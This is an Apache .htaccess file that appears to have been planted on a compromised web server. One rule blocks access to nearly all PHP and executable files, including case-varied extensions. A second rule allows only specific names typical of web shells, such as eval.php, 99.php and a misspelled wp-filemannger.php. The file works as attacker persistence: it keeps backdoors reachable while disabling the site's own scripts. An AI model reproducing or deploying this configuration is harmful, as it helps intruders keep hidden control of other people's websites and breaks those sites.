<FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|php7|phP|PhP|php5|php56|php8|suspected)$'>
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "(^file.php|^ok.php|^eval.php|^index.php|^wp-filemannger.php|^anz.php|^..php|^ k.php|^99.php|^db.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>